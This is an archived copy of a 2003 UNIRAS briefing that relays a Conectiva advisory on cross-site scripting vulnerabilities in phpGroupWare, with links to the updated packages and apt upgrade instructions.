[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

UNIRAS Brief - 413/03 - Conectiva - Cross site scripting vulnerabilities in phpgroupware



-----BEGIN PGP SIGNED MESSAGE-----

- ----------------------------------------------------------------------------------
   UNIRAS (UK Govt CERT) Briefing Notice - 413/03 dated 21.07.03  Time: 14:30
   UNIRAS is part of NISCC (National Infrastructure Security Co-ordination Centre)
- ----------------------------------------------------------------------------------
   UNIRAS material is also available from its website at www.uniras.gov.uk and
   information about NISCC is available from www.niscc.gov.uk
- ----------------------------------------------------------------------------------


(NOTICE OF NEW ARRANGEMENTS
 ==========================

 Distribution of UNIRAS briefings is being migrated to a new list server, and
 announcements of enhancements to the service will appear shortly.  Meanwhile,
 recipients may notice changes to mail headers and the routing of messages.
 Authenticity of ALL briefings can be verified using the UNIRAS PGP key.)


Title
=====

Conectiva Security Advisory:

Cross site scripting vulnerabilities in phpgroupware

Detail
======

- -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - --------------------------------------------------------------------------
CONECTIVA LINUX SECURITY ANNOUNCEMENT
- - --------------------------------------------------------------------------

PACKAGE   : phpgroupware
SUMMARY   : Cross site scripting vulnerabilities
DATE      : 2003-07-16 12:14:00
ID        : CLA-2003:697
RELEVANT
RELEASES  : 7.0, 8, 9

- - -------------------------------------------------------------------------

DESCRIPTION
 phpGroupWare[1] is a web-based groupware suite written in PHP.

 François Sorin discovered[2] several "cross-site-scripting"
 vulnerabilities in versions of phpgroupware <= 0.9.14.003. By
 exploiting these vulnerabilities, a remote attacker can obtain
 sensitive information such as authentication cookies, or change the
 behavior of the browser by crafting a special URL with javascript in
 it and somehow having an user click on it.

 This announcement updates phpGroupware to the latest stable version:
 0.9.14.005.


SOLUTION
 All phpgroupware users should upgrade.


 REFERENCES:
 1.http://www.phpgroupware.org/
 2.http://www.security-corporation.com/articles-20030702-005.html


UPDATED PACKAGES
ftp://atualizacoes.conectiva.com.br/7.0/RPMS/phpgroupware-0.9.14.005-1U70_2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/7.0/SRPMS/phpgroupware-0.9.14.005-1U70_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/8/RPMS/phpgroupware-0.9.14.005-1U80_2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/8/SRPMS/phpgroupware-0.9.14.005-1U80_2cl.src.rpm
ftp://atualizacoes.conectiva.com.br/9/RPMS/phpgroupware-0.9.14.005-9432U90_2cl.noarch.rpm
ftp://atualizacoes.conectiva.com.br/9/SRPMS/phpgroupware-0.9.14.005-9432U90_2cl.src.rpm


ADDITIONAL INSTRUCTIONS
 The apt tool can be used to perform RPM packages upgrades:

 - run:                 apt-get update
 - after that, execute: apt-get upgrade

 Detailed instructions reagarding the use of apt and upgrade examples
 can be found at http://distro.conectiva.com.br/atualizacoes/#apt?idioma=en

- - -------------------------------------------------------------------------
All packages are signed with Conectiva's GPG key. The key and instructions
on how to import it can be found at
http://distro.conectiva.com.br/seguranca/chave/?idioma=en
Instructions on how to check the signatures of the RPM packages can be
found at http://distro.conectiva.com.br/seguranca/politica/?idioma=en

- - -------------------------------------------------------------------------
All our advisories and generic update instructions can be viewed at
http://distro.conectiva.com.br/atualizacoes/?idioma=en

- - -------------------------------------------------------------------------
Copyright (c) 2003 Conectiva Inc.
http://www.conectiva.com

- - -------------------------------------------------------------------------
subscribe: conectiva-updates-subscribe@xxxxxxxxxxxxxxxxxxxxxxxxxxx
unsubscribe: conectiva-updates-unsubscribe@xxxxxxxxxxxxxxxxxxxxxxxxxxx
- -----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.6 (GNU/Linux)
Comment: For info see http://www.gnupg.org

iD8DBQE/FZMK42jd0JmAcZARArtCAJ9chSGIZIPr6f4hzmMu1S4gUnyK6ACfTbHF
yasuzUNEusu4FhIRl77SZMw=
=y1Et
- -----END PGP SIGNATURE-----

- ----------------------------------------------------------------------------------

For additional information or assistance, please contact the HELP Desk by
telephone or Not Protectively Marked information may be sent via EMail to:
uniras@xxxxxxxxxxxx

Office Hours:
Mon - Fri: 08:30 - 17:00 Hrs
Tel: +44 (0) 20 7821 1330 Ext 4511
Fax: +44 (0) 20 7821 1686

Outside of Office Hours:
On Call Duty Officer:
Tel: +44 (0) 20 7821 1330 and follow the prompts

- ----------------------------------------------------------------------------------
UNIRAS wishes to acknowledge the contributions of Conectiva for the information
contained in this Briefing.
- ----------------------------------------------------------------------------------
This Briefing contains the information released by the original author. Some
of the information may have changed since it was released. If the vulnerability
affects you, it may be prudent to retrieve the advisory from the canonical site
to ensure that you receive the most current information concerning that problem.

Reference to any specific commercial product, process, or service by trade
name, trademark manufacturer, or otherwise, does not constitute or imply
its endorsement, recommendation, or favouring by UNIRAS or NISCC.  The views
and opinions of authors expressed within this notice shall not be used for
advertising or product endorsement purposes.

Neither UNIRAS or NISCC shall also accept responsibility for any errors
or omissions contained within this briefing notice. In particular, they shall
not be liable for any loss or damage whatsoever, arising from or in connection
with the usage of information contained within this notice.

UNIRAS is a member of the Forum of Incident Response and Security Teams (FIRST)
and has contacts with other international Incident Response Teams (IRTs) in
order to foster cooperation and coordination in incident prevention, to prompt
rapid reaction to incidents, and to promote information sharing amongst its
members and the community at large.
- ----------------------------------------------------------------------------------
<End of UNIRAS Briefing>
-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0

iQCVAwUBPxvs5opao72zK539AQEWpQP8D2EbS66ZdLg46mW3TVIvqipDJABNeUZ5
LjveoPK9Rw+mGKKVRDPKAGqOyn9nR2Eab9LSGiwkqH2SRaeR3vMDz8EogMK7aSD/
eCwuJZ1h0Xkv4eci5txkgQH0K8ClURpbxLgUBHoVkr/WTHQwneqMLdkITQLdZpAf
QqQqLm+oRHg=
=1SBQ
-----END PGP SIGNATURE-----